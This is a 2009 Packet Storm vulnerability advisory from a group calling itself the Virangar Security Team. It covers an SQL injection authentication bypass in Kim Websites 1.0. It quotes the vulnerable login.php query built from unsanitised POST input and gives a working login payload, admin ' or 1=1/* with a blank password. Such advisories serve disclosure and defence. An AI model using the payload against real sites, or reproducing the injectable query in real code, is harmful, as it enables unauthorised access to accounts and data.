Kim Websites 1.0 SQL Injection

2009-03-13T00:00:00
ID PACKETSTORM:75705
Type packetstorm
Reporter hadihadi
Modified 2009-03-13T00:00:00

Description

                                        
                                            `   
###############################################################  
# #  
# Kim Websites 1.0 SQL Injection Vulnerability #  
# [ Authentication bypass] #  
###############################################################  
Virangar Security Team  
www.virangar.net  
--------  
Discoverd By : Virangar Security Team(hadihadi)  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra  
& all virangar members & Aria_security team & all hackerz  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal)  
-----------------------------------  
vuln code in login.php:  
$username = $_POST['username'];  
$password = md5($_POST['password']);  
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";  
-----------------------  
Exploit:  
login:admin ' or 1=1/*  
password:[blank]  
-------------------------------------  
Y0ung Ir4ni4n H4ck3rz  
  
`